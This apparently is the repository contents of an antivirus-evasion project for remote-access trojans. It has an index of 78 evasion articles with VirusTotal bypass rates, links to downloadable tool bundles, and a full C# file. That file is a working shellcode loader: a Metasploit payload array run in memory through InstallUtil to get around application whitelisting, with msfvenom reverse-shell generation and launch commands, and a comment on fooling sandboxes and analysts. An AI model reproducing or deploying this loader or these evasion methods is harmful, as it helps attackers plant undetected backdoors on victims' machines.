- **Code section**: C/C++, C#, python, powershell, ruby, go and others.

- **Whitelist section**: 113 whitelisted programs in total, including Rundll32.exe, Msiexec.exe, MSBuild.exe, InstallUtil.exe, Mshta.exe, Regsvr32.exe, Cmstp.exe, CScript.exe, WScript.exe, Forfiles.exe, te.exe, Odbcconf.exe, InfDefaultInstall.exe, Diskshadow.exe, PsExec.exe, Msdeploy.exe, Winword.exe, Regasm.exe, Regsvcs.exe, Ftp.exe, pubprn.vbs, winrm.vbs, slmgr.vbs, Xwizard.exe, Compiler.exe, IEExec.exe, MavInject32, Presentationhost.exe, Wmic.exe, Pcalua.exe, Url.dll, zipfldr.dll, Syncappvpublishingserver.vbs and others.

- **Other content**: While writing the series I also interspersed a few articles on evasion in practice, such as shellcode evasion practice, CS evasion practice and mimikatz evasion practice. They are fairly ordinary; bear with them.

**Completed evasion articles and related software downloads: [`https://github.com/TideSec/BypassAntiVirus`](https://github.com/TideSec/BypassAntiVirus)**

**Baidu Netdisk download of the bundled series articles and accompanying tools**:
Link: [https://pan.baidu.com/s/1YKbNHzWudMwjGx-3_7KZxw](https://pan.baidu.com/s/1YKbNHzWudMwjGx-3_7KZxw) Extraction code: 5q5q
Unzip password: www.tidesec.com

# Evasion capability overview

**1. A √ in the table means the corresponding anti-virus product did not detect the sample, i.e. a bypass.**

**2. For a better comparison, most test payloads were generated with msf's `windows/meterpreter/reverse_tcp` module.**

**3. Because only the 360 suite and Huorong were installed on the test machine, by default the 360 and Huorong results refer to static + dynamic detection. 360 AV version `5.0.0.8160` (2020.01.01), Huorong version `5.0.34.16` (2020.01.01), 360 Security Guard `12.0.0.2002` (2020.01.01).**

**4. The detection figures for other AV products come from online scans at `virustotal.com` (VT), so they may only represent static detection capability. The data is for reference only and is not sufficient to judge an AV product's detection ability or a technique's evasion ability.**

**5. There is no need to demand that one evasion technique bypass every AV. Such techniques certainly exist; they just have not been made public, and once public they get detected the next day. In practice, bypassing the AV on the target host is enough.**

**6. Because evasion testing of whitelisted programs loading payloads only makes sense with behavioural detection by the AV, and static detection of the payload or of the whitelisted program itself is meaningless, no judgment is made here on the evasion effect of whitelisted programs.**

# Article navigation

1. RAT evasion series (1) - Basics: [https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg](https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg)

2. RAT evasion series (2) - Hidden msfvenom parameters: [https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w](https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w)

3. RAT evasion series (3) - msf built-in evasion (VT evasion rate 35/69): [https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA](https://mp.weixin.qq.com/s/A0CZslLhCLOK_HgkHGcpEA)

4. RAT evasion series (4) - Evasion module (VT evasion rate 12/71): [https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ](https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ)

5. RAT evasion series (5) - Veil evasion (VT evasion rate 23/71): [https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw](https://mp.weixin.qq.com/s/-PHVIAQVyU8QIpHwcpN4yw)

6. RAT evasion series (6) - Venom evasion (VT evasion rate 11/71): [https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ](https://mp.weixin.qq.com/s/CbfxupSWEPB86tBZsmxNCQ)

7. RAT evasion series (7) - Shellter evasion (VT evasion rate 7/69): [https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg](https://mp.weixin.qq.com/s/ASnldn6nk68D4bwkfYm3Gg)

8. RAT evasion series (8) - BackDoor-Factory evasion (VT evasion rate 13/71): [https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ](https://mp.weixin.qq.com/s/A30JHhXhwe45xV7hv8jvVQ)

9. RAT evasion series (9) - Avet evasion (VT evasion rate 14/71): [https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA](https://mp.weixin.qq.com/s/EIfqAbMC8HoC6xcZP9SXpA)

10. RAT evasion series (10) - TheFatRat evasion (VT evasion rate 22/70): [https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA](https://mp.weixin.qq.com/s/zOvwfmEtbkpGWWBn642ICA)

11. RAT evasion series (11) - Avoidz evasion (VT evasion rate 23/71): [https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg](https://mp.weixin.qq.com/s/TnfTXihlyv696uCiv3aWfg)

12. RAT evasion series (12) - Green-Hat-Suite evasion (VT evasion rate 23/70): [https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg](https://mp.weixin.qq.com/s/MVJTXOIqjgL7iEHrnq6OJg)

13. RAT evasion series (13) - zirikatu evasion (VT evasion rate 39/71): [https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA](https://mp.weixin.qq.com/s/5xLuu5UfF4cQbCq_6JeqyA)

14. RAT evasion series (14) - AVIator evasion (VT evasion rate 25/69): [https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q](https://mp.weixin.qq.com/s/JYMq_qHvnslVlqijHNny8Q)

15. RAT evasion series (15) - DKMC evasion (VT evasion rate 8/55): [https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg](https://mp.weixin.qq.com/s/UZqOBQKEMcXtF5ZU7E55Fg)

16. RAT evasion series (16) - Unicorn evasion (VT evasion rate 29/56): [https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw](https://mp.weixin.qq.com/s/y7P6bvHRFes854EAHAPOzw)

17. RAT evasion series (17) - Python-Rootkit evasion (VT evasion rate 7/69): [https://mp.weixin.qq.com/s/OzO8hv0pTX54ex98k96tjQ](https://mp.weixin.qq.com/s/OzO8hv0pTX54ex98k96tjQ)

18. RAT evasion series (18) - ASWCrypter evasion (VT evasion rate 19/57): [https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ](https://mp.weixin.qq.com/s/tT1i55swRWIYiEdxEWElSQ)

19. RAT evasion series (19) - nps_payload evasion (VT evasion rate 3/57): [https://mp.weixin.qq.com/s/XmSRgRUftMV3nmD1Gk0mvA](https://mp.weixin.qq.com/s/XmSRgRUftMV3nmD1Gk0mvA)

20. RAT evasion series (20) - GreatSCT evasion (VT evasion rate 14/56): [https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ](https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ)

21. RAT evasion series (21) - HERCULES evasion (VT evasion rate 29/70): [https://mp.weixin.qq.com/s/Rkr9lixzL4tiL89r10ndig](https://mp.weixin.qq.com/s/Rkr9lixzL4tiL89r10ndig)

22. RAT evasion series (22) - SpookFlare evasion (VT evasion rate 16/67): [https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA](https://mp.weixin.qq.com/s/LfuQ2XuD7YHUWJqMRUmNVA)

23. RAT evasion series (23) - SharpShooter evasion (VT evasion rate 22/57): [https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg](https://mp.weixin.qq.com/s/EyvGfWXLbxkHe7liaNFhGg)

24. RAT evasion series (24) - CACTUSTORCH evasion (VT evasion rate 23/57): [https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw](https://mp.weixin.qq.com/s/g0CYvFMsrV7bHIfTnSUJBw)

25. RAT evasion series (25) - Winpayloads evasion (VT evasion rate 18/70): [https://mp.weixin.qq.com/s/YTXT31mCOWhMZEbCg4Jt0w](https://mp.weixin.qq.com/s/YTXT31mCOWhMZEbCg4Jt0w)

26. RAT evasion series (26) - C/C++ loader evasion (part 1) (VT evasion rate 9-70): [https://mp.weixin.qq.com/s/LftwV4bpuikDklIjuRw2LQ](https://mp.weixin.qq.com/s/LftwV4bpuikDklIjuRw2LQ)

27. RAT evasion series (27) - C/C++ loader evasion (part 2) (VT evasion rate 8-70): [https://mp.weixin.qq.com/s/McVWP386q5in6cQ8hRxwdA](https://mp.weixin.qq.com/s/McVWP386q5in6cQ8hRxwdA)

28. RAT evasion series (28) - C/C++ loader evasion (part 3) (VT evasion rate 3-71): [https://mp.weixin.qq.com/s/Kw3-fdyHyiettYn44WNZQw](https://mp.weixin.qq.com/s/Kw3-fdyHyiettYn44WNZQw)

29. RAT evasion series (29) - C# loader evasion, 5 methods (VT evasion rate 8-70): [https://mp.weixin.qq.com/s/Kvhfb13d2_D6m-Bu9Darog](https://mp.weixin.qq.com/s/Kvhfb13d2_D6m-Bu9Darog)

30. RAT evasion series (30) - Python loader evasion, 8 methods (VT evasion rate 10-69): [https://mp.weixin.qq.com/s/HyBSqrF_kl2ARaCYAMefgA](https://mp.weixin.qq.com/s/HyBSqrF_kl2ARaCYAMefgA)

31. RAT evasion series (31) - powershell loader, 4 methods (VT evasion rate 5-58): [https://mp.weixin.qq.com/s/Tw-FAduHMVzek_YxIErQDQ](https://mp.weixin.qq.com/s/Tw-FAduHMVzek_YxIErQDQ)

32. RAT evasion series (32) - Go loader evasion, 3 methods (VT evasion rate 7-70): [https://mp.weixin.qq.com/s/TmfDQgRfEp2qg9SKbD0Quw](https://mp.weixin.qq.com/s/TmfDQgRfEp2qg9SKbD0Quw)

33. RAT evasion series (33) - Ruby loader evasion (VT evasion rate 0-58): [https://mp.weixin.qq.com/s/2eF6LklvdGetgbhYWdaFIg](https://mp.weixin.qq.com/s/2eF6LklvdGetgbhYWdaFIg)

34. RAT evasion series (34) - Whitelist MSBuild.exe (VT evasion rate 4-57): [https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA](https://mp.weixin.qq.com/s/1WEglPXm1Q5n6T-c4OhhXA)

35. RAT evasion series (35) - Whitelist Msiexec.exe (VT evasion rate 27-60): [https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg](https://mp.weixin.qq.com/s/XPrBK1Yh5ggO-PeK85mqcg)

36. RAT evasion series (36) - Whitelist InstallUtil.exe (VT evasion rate 3-68): [https://mp.weixin.qq.com/s/gN2p3ZHODZFia2761BVSzg](https://mp.weixin.qq.com/s/gN2p3ZHODZFia2761BVSzg)

37. RAT evasion series (37) - Whitelist Mshta.exe (VT evasion rate 26-58): [https://mp.weixin.qq.com/s/oBr-syv2ef5IjeGFrs7sHg](https://mp.weixin.qq.com/s/oBr-syv2ef5IjeGFrs7sHg)

38. RAT evasion series (38) - Whitelist Rundll32.exe (VT evasion rate 22-58): [https://mp.weixin.qq.com/s/rmC4AWC6HmcphozfEZhRGA](https://mp.weixin.qq.com/s/rmC4AWC6HmcphozfEZhRGA)

39. RAT evasion series (39) - Whitelist Regsvr32.exe (VT evasion rate 18-58): [https://mp.weixin.qq.com/s/6v8w2YZLxHJFnXb-IbnYAA](https://mp.weixin.qq.com/s/6v8w2YZLxHJFnXb-IbnYAA)

40. RAT evasion series (40) - Whitelist Cmstp.exe (VT detection rate 21-57): [https://mp.weixin.qq.com/s/tgtvOMDGlKFwdRQEnKJf5Q](https://mp.weixin.qq.com/s/tgtvOMDGlKFwdRQEnKJf5Q)

41. RAT evasion series (41) - Whitelist Ftp.exe: [https://mp.weixin.qq.com/s/rnmCIx5oxA9z-0OfjoUAVw](https://mp.weixin.qq.com/s/rnmCIx5oxA9z-0OfjoUAVw)

42. RAT evasion series (42) - Whitelist Regasm/Regsvcs.exe: [https://mp.weixin.qq.com/s/MCMjxPdUNdwV8is04AklLA](https://mp.weixin.qq.com/s/MCMjxPdUNdwV8is04AklLA)

43. RAT evasion series (43) - Whitelist Compiler.exe: [https://mp.weixin.qq.com/s/Sm_3cJlSk6Pud1CLp-eAEQ](https://mp.weixin.qq.com/s/Sm_3cJlSk6Pud1CLp-eAEQ)

44. RAT evasion series (44) - Whitelist MavInject.exe: [https://mp.weixin.qq.com/s/dPOGj1VLhqwxJ0e-gOs8vA](https://mp.weixin.qq.com/s/dPOGj1VLhqwxJ0e-gOs8vA)

45. RAT evasion series (45) - Whitelist presentationhost.exe: [https://mp.weixin.qq.com/s/r9l5Lh6MHv-Ece2DFr3EsA](https://mp.weixin.qq.com/s/r9l5Lh6MHv-Ece2DFr3EsA)

46. RAT evasion series (46) - Whitelist IEexec.exe: [https://mp.weixin.qq.com/s/wVbFrU9cE3hCYAENjmnSUQ](https://mp.weixin.qq.com/s/wVbFrU9cE3hCYAENjmnSUQ)

47. RAT evasion series (47) - Whitelist winrm.vbs, slmgr.vbs: [https://mp.weixin.qq.com/s/B3oiMrEB98jtm4DvD2t2tQ](https://mp.weixin.qq.com/s/B3oiMrEB98jtm4DvD2t2tQ)

48. RAT evasion series (48) - Whitelist pubprn.vbs: [https://mp.weixin.qq.com/s/btiaVMBPxfxG4oXPa7__kw](https://mp.weixin.qq.com/s/btiaVMBPxfxG4oXPa7__kw)

49. RAT evasion series (49) - Whitelist Xwizard.exe: [https://mp.weixin.qq.com/s/8gaweOqkOrT77riaevvFUg](https://mp.weixin.qq.com/s/8gaweOqkOrT77riaevvFUg)

50. RAT evasion series (50) - Whitelist winword.exe: [https://mp.weixin.qq.com/s/qXWK5i2cDaletSzkAEzL3w](https://mp.weixin.qq.com/s/qXWK5i2cDaletSzkAEzL3w)

51. RAT evasion series (51) - Whitelist msdeploy.exe: [https://mp.weixin.qq.com/s/1oEzadXZxd3JukrBhNxxyw](https://mp.weixin.qq.com/s/1oEzadXZxd3JukrBhNxxyw)

52. RAT evasion series (52) - Whitelist psexec.exe: [https://mp.weixin.qq.com/s/JdOmlqif67GcSqZuuGPz0Q](https://mp.weixin.qq.com/s/JdOmlqif67GcSqZuuGPz0Q)

53. RAT evasion series (53) - Whitelist WMIC.exe: [https://mp.weixin.qq.com/s/QNqM8Vdlu-SOP7ZqnRWY3w](https://mp.weixin.qq.com/s/QNqM8Vdlu-SOP7ZqnRWY3w)

54. RAT evasion series (54) - Whitelist SyncAppvPublishingServer.vbs: [https://mp.weixin.qq.com/s/Ud7TbeMJb8fsRlaGHWhBww](https://mp.weixin.qq.com/s/Ud7TbeMJb8fsRlaGHWhBww)

55. RAT evasion series (55) - Whitelist Pcalua.exe: [https://mp.weixin.qq.com/s/Aj9A5_LRS_uX8XN1rdUobQ](https://mp.weixin.qq.com/s/Aj9A5_LRS_uX8XN1rdUobQ)

56. RAT evasion series (56) - Whitelist zipfldr.dll: [https://mp.weixin.qq.com/s/-qPVenI_lk-ZnMA4j9XNRQ](https://mp.weixin.qq.com/s/-qPVenI_lk-ZnMA4j9XNRQ)

57. RAT evasion series (57) - Whitelist Url.dll: [https://mp.weixin.qq.com/s/GzoYvfj7NkXe_nc8eOVEBQ](https://mp.weixin.qq.com/s/GzoYvfj7NkXe_nc8eOVEBQ)

58. RAT evasion series (58) - Whitelist DiskShadow.exe: [https://mp.weixin.qq.com/s/pr0KYjk80YIk4qJO5h3Yaw](https://mp.weixin.qq.com/s/pr0KYjk80YIk4qJO5h3Yaw)

59. RAT evasion series (59) - Whitelist Odbcconf.exe: [https://mp.weixin.qq.com/s/uOwqbW0nkG776zZz6O_WFA](https://mp.weixin.qq.com/s/uOwqbW0nkG776zZz6O_WFA)

60. RAT evasion series (60) - Whitelist Forfiles.exe: [https://mp.weixin.qq.com/s/1-HyeNrd4IXQYsyG6dHQkw](https://mp.weixin.qq.com/s/1-HyeNrd4IXQYsyG6dHQkw)

61. RAT evasion series (61) - Whitelist Te.exe: [https://mp.weixin.qq.com/s/m37wm620qQ1xw4BN2hGOpg](https://mp.weixin.qq.com/s/m37wm620qQ1xw4BN2hGOpg)

62. RAT evasion series (62) - Whitelist CScript.exe / WScript.exe: [https://mp.weixin.qq.com/s/jzWHq7Yc1UjOwnXulIAPKQ](https://mp.weixin.qq.com/s/jzWHq7Yc1UjOwnXulIAPKQ)

63. RAT evasion series (63) - Whitelist InfDefaultInstall.exe: [https://mp.weixin.qq.com/s/mrtX4ayCXJJ1LPfBlSuvHw](https://mp.weixin.qq.com/s/mrtX4ayCXJJ1LPfBlSuvHw)

64. RAT evasion series (64) - Supplement on Msf self-compiled evasion: [https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg](https://mp.weixin.qq.com/s/HsIqUKl7j1WJ4yyYzXdPZg)

65. RAT evasion series (65) - Supplement on shellcode evasion practice: [https://mp.weixin.qq.com/s/J78CPtHJX5ouN6fxVxMFgg](https://mp.weixin.qq.com/s/J78CPtHJX5ouN6fxVxMFgg)

66. RAT evasion series (66) - Tools section summary: [https://mp.weixin.qq.com/s/WdErH1AOaI3B5Kptu7DK5Q](https://mp.weixin.qq.com/s/WdErH1AOaI3B5Kptu7DK5Q)

67. RAT evasion series (67) - Whitelist section summary: [https://mp.weixin.qq.com/s/2bC5otYgIgGnod-cXwkfqw](https://mp.weixin.qq.com/s/2bC5otYgIgGnod-cXwkfqw)

68. RAT evasion series (68) - Mimikatz evasion practice (part 1): [https://mp.weixin.qq.com/s/CiOaMnJBcEQfZXV_hopzLw](https://mp.weixin.qq.com/s/CiOaMnJBcEQfZXV_hopzLw)

69. RAT evasion series (69) - Mimikatz evasion practice (part 2): [https://mp.weixin.qq.com/s/0p88rj-tWClLa_geKMkPgw](https://mp.weixin.qq.com/s/0p88rj-tWClLa_geKMkPgw)

70. RAT evasion series (70) - Final chapter: [https://mp.weixin.qq.com/s/4shT8tP-Gu3XX7fnWKQHAA](https://mp.weixin.qq.com/s/4shT8tP-Gu3XX7fnWKQHAA)

71. RAT evasion series (71) - Donut: evasion for any executable: [https://mp.weixin.qq.com/s/DoWRTIIBwuvzRd59wIWpXw](https://mp.weixin.qq.com/s/DoWRTIIBwuvzRd59wIWpXw)

72. RAT evasion series (72) - sRDI reflective DLL injection evasion: [https://mp.weixin.qq.com/s/GeR1Uc2zmdoHUD1m4PUPkA](https://mp.weixin.qq.com/s/GeR1Uc2zmdoHUD1m4PUPkA)

73. RAT evasion series (73) - Multiple evasion methods using stager.dll: [https://mp.weixin.qq.com/s/23fZTmpT7YVkguvHfXC57Q](https://mp.weixin.qq.com/s/23fZTmpT7YVkguvHfXC57Q)

74. RAT evasion series (74) - Go-based condition-triggered evasion: [https://mp.weixin.qq.com/s/td9_TFaM8svEmq4uBWxBXg](https://mp.weixin.qq.com/s/td9_TFaM8svEmq4uBWxBXg)

75. RAT evasion series (75) - Go-based sandbox detection: [https://mp.weixin.qq.com/s/I04c944ED0UBWY8_Hq0t0g](https://mp.weixin.qq.com/s/I04c944ED0UBWY8_Hq0t0g)

76. RAT evasion series (76) - Go-based evasion tests of various APIs: [https://mp.weixin.qq.com/s/c4LkV7PdzaXYH7H1Ix6mcA](https://mp.weixin.qq.com/s/c4LkV7PdzaXYH7H1Ix6mcA)

77. RAT evasion series (77) - Go-based evasion summary: [https://mp.weixin.qq.com/s/yxDYccGRgUayd4XeHkrNQg](https://mp.weixin.qq.com/s/yxDYccGRgUayd4XeHkrNQg)

78. The 潮影 online evasion platform is live: [https://mp.weixin.qq.com/s/nuUg8lOdghdcI5egMqzD0A](https://mp.weixin.qq.com/s/nuUg8lOdghdcI5egMqzD0A)

**Finished! Confetti~**

# About the Tide security team

The Tide security team is committed to sharing high-quality original articles. Our research covers network attack and defence, web security, mobile terminals, secure development, IoT/ICS security and other areas; anyone interested in security is welcome to follow or join us.

The Tide security team has developed and open-sourced several security platforms, such as the Tide (潮汐) cyberspace search platform, the 潮启 mobile security management platform, the distributed web scanning platform WDScanner, the Mars network threat monitoring platform, the 潮汐 fingerprint identification system, the 潮巡 automated vulnerability discovery platform, an industrial internet security monitoring platform, a vulnerability knowledge base, a proxy pool, a dictionary weighting library, an internal training system and more.

Since its founding, the Tide security team has continuously submitted vulnerabilities to CNCERT, CNVD, Vulbox (漏洞盒子), Butian, the major SRCs and other vulnerability submission platforms; the two vulnerability-hunting teams it formed on Vulbox each ranked in the top ten among more than 300 security teams nationwide. Team members maintain columns or blogs on FreeBuf, Anquanke, Secpulse, t00ls, Jianshu, CSDN, 51CTO, CnBlogs and other sites, researching security techniques and sharing experience and skills.

Anyone interested in security can follow the Tide security team Wiki: [http://paper.TideSec.com](http://paper.TideSec.com) or the team's WeChat public account.

<div align=center><img src=images/ewm.png width=30% ></div>

/images/0.png:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/0.png

/images/ewm.png:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/ewm.png

/images/msnl01.png:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/msnl01.png

/images/msnl02.png:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/msnl02.png

/images/tide.png:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/tide.png

/images/tide2.png:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/images/tide2.png

/tools/AVIator.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/AVIator.zip

/tools/DotNetToJScript.zip:
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/DotNetToJScript.zip

/tools/InstallUtil-Shellcode.cs:

```csharp
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
Step One:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:exeshell.exe Shellcode.cs
Step Two:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
(Or)
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
The gist of this one is we can exhibit one behaviour if the application is launched via normal method, Main().
Yet, when the Assembly is launched via InstallUtil.exe, it is loaded via Reflection and circumvents many whitelist controls.
We believe the root issue here is:

The root issue here with Assembly.Load() is that at the point at which execute operations are detected
(CreateFileMapping->NtCreateSection), only read-only access to the section is requested, so it is not processed as an execute operation.
Later, execute access is requested in the file mapping (MapViewOfFile->NtMapViewOfSection),
which results in the image being mapped as EXECUTE_WRITECOPY and subsequently allows unchecked execute access.

The concern is this technique can circumvent many security products, so I wanted to make you aware and get any feedback.
It's not really an exploit, but just a creative way to launch an exe/assembly.
*/

//root@infosec:~# msfvenom --payload windows/meterpreter/reverse_https LHOST=10.0.0.1 LPORT=443 -f csharp > pentestShellCode.txt

public class Program
{
    public static void Main()
    {
        Console.WriteLine("Hello From Main...I Don't Do Anything");
        //Add any behaviour here to throw off sandbox execution/analysts :)
    }
}

[System.ComponentModel.RunInstaller(true)]
public class Sample : System.Configuration.Install.Installer
{
    //The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
    public override void Uninstall(System.Collections.IDictionary savedState)
    {
        Shellcode.Exec();
    }
}

public class Shellcode
{
    public static void Exec()
    {
        // native function's compiled code
        // generated with metasploit
        byte[] shellcode = new byte[503] {
            0xba,0x6e,0xad,0xe9,0x4f,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,
            0x78,0x83,0xee,0xfc,0x31,0x56,0x0e,0x03,0x38,0xa3,0x0b,0xba,0x1e,0x71,0x75,
            0xbe,0x85,0x74,0xe0,0x98,0xcd,0x5c,0x01,0x42,0x1e,0x54,0x58,0x02,0x51,0x16,
            0x83,0x66,0x51,0xd2,0xb0,0x18,0xbe,0x22,0xb1,0x0a,0x52,0x01,0xc2,0xca,0xa5,
            0x44,0x61,0x18,0x6a,0x8d,0x90,0xf1,0x8e,0xe2,0x41,0x33,0xf8,0x82,0xdb,0xcf,
            0x36,0x26,0xfc,0xc3,0xf3,0x4c,0xa5,0x7f,0x86,0xb1,0x77,0xff,0xdc,0x9b,0x25,
            0xbf,0xa3,0x50,0xd1,0xf1,0x44,0x9b,0x8f,0xf1,0x7d,0xe8,0xee,0x19,0x69,0xa9,
            0x1a,0x9b,0x5c,0x23,0xa8,0x95,0x76,0x01,0x7b,0xa0,0x42,0x72,0x34,0x11,0x17,
            0xf5,0x8f,0x69,0x2b,0xc2,0xcd,0x90,0x81,0x20,0x10,0x90,0x8a,0xa7,0xc0,0x37,
            0x59,0x51,0x8e,0x30,0x2a,0x29,0xf0,0x33,0x54,0xbe,0x01,0xf0,0xa2,0x53,0x2e,
            0xd0,0xb6,0xb3,0x43,0xa3,0x91,0x74,0xc4,0xa7,0x79,0x60,0x6c,0xab,0xc3,0xc0,
            0x5a,0x80,0x55,0xcd,0xc3,0x85,0xe7,0xd4,0x1d,0xc7,0x42,0xfa,0x1e,0x7b,0x57,
            0xc5,0x8b,0xa7,0x03,0x27,0x23,0x04,0x40,0x5a,0xdf,0x62,0x6d,0x0e,0x8a,0xc9,
            0xee,0x64,0x07,0x89,0x13,0xa9,0x54,0x07,0xc2,0xa4,0x34,0x25,0x56,0x52,0x1e,
            0x1e,0x71,0xc8,0x45,0xd5,0x0a,0xfe,0xb9,0xba,0xef,0x23,0x5f,0x39,0x8e,0x48,
            0xac,0x93,0x89,0x3d,0xc9,0x77,0x5b,0x9a,0x80,0x53,0x13,0xf8,0xbf,0x11,0x28,
            0x58,0x74,0x59,0x60,0x85,0x3c,0x96,0x9f,0x35,0xc2,0x27,0x33,0xe8,0xbf,0x1c,
            0x41,0xa7,0xca,0x33,0x78,0xda,0x7e,0x73,0x21,0x05,0xae,0x3a,0xc9,0xad,0xb5,
            0x7c,0x43,0x99,0x2f,0x58,0x16,0xe3,0x51,0xa9,0x72,0x3a,0x04,0x01,0x32,0x26,
            0xfb,0x54,0x0e,0x0e,0xad,0x23,0xa0,0x6e,0x40,0xc2,0xf7,0x87,0xb9,0x54,0x72,
            0x5b,0xb9,0x1e,0x75,0x9c,0x5c,0x2b,0x0a,0x2c,0x59,0x05,0x5e,0x7a,0x5f,0x7b,
            0x5b,0x14,0xa1,0x56,0x2e,0xd3,0x37,0xb5,0x11,0xfc,0x65,0x8a,0xff,0x6a,0x02,
            0x92,0xbf,0xd3,0x58,0x44,0x5d,0x8f,0x84,0x4e,0x42,0xbb,0xe8,0xce,0x6a,0xb2,
            0x0b,0x81,0xfd,0x77,0x50,0x59,0x1e,0x65,0x41,0x4f,0x80,0xf7,0x54,0x3c,0x94,
            0xdf,0xa3,0x6c,0xe6,0x8a,0x92,0xf8,0x50,0x15,0x77,0xdd,0xa8,0xa7,0x41,0x46,
            0xd7,0xe5,0x54,0x2f,0xe0,0x7e,0x09,0x83,0x68,0x90,0x6a,0x4e,0x64,0x9c,0x66,
            0xa1,0x5f,0xa7,0x8d,0xc3,0x3f,0x56,0x2c,0xe6,0x88,0xc0,0xb1,0xc1,0xee,0xc4,
            0x7b,0x3c,0x93,0x8d,0x8d,0xe0,0xad,0x92,0x91,0x84,0x58,0x28,0x64,0x34,0xc8,
            0xdc,0x5e,0x78,0xb8,0x69,0xb2,0x04,0x5a,0x32,0x88,0x9e,0x9d,0x98,0xd6,0xfa,
            0x19,0x89,0x7f,0x70,0x72,0x22,0x54,0x25,0x3f,0xcb,0x31,0x90,0x67,0xe7,0x68,
            0xb0,0xb6,0x72,0xe9,0xd4,0xfa,0xcb,0x0a,0xdc,0x4a,0xab,0xf8,0xbc,0xe3,0x1d,
            0x11,0x7a,0xbc,0x3e,0x68,0x32,0x1c,0x3b,0xb7,0x33,0x57,0x2f,0x41,0x98,0x5e,
            0xa8,0x0f,0x6c,0xc2,0xb7,0x52,0xe5,0x8e,0x45,0xae,0x43,0xfc,0xae,0xfe,0x87,
            0x4f,0xe0,0xc2,0x52,0xff,0x8e,0x19,0x9e };

        UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
            MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
        IntPtr hThread = IntPtr.Zero;
        UInt32 threadId = 0;
        // prepare data
        IntPtr pinfo = IntPtr.Zero;

        // execute native code
        hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }

    private static UInt32 MEM_COMMIT = 0x1000;

    private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

    [DllImport("kernel32")]
    private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

    [DllImport("kernel32")]
    private static extern bool VirtualFree(IntPtr lpAddress,
        UInt32 dwSize, UInt32 dwFreeType);

    [DllImport("kernel32")]
    private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
    );

    [DllImport("kernel32")]
    private static extern bool CloseHandle(IntPtr handle);

    [DllImport("kernel32")]
    private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
    );

    [DllImport("kernel32")]
    private static extern IntPtr GetModuleHandle(
        string moduleName
    );

    [DllImport("kernel32")]
    private static extern UInt32 GetProcAddress(
        IntPtr hModule,
        string procName
    );

    [DllImport("kernel32")]
    private static extern UInt32 LoadLibrary(
        string lpFileName
    );

    [DllImport("kernel32")]
    private static extern UInt32 GetLastError();
}
```

/tools/Invoke-Obfuscation.zip:
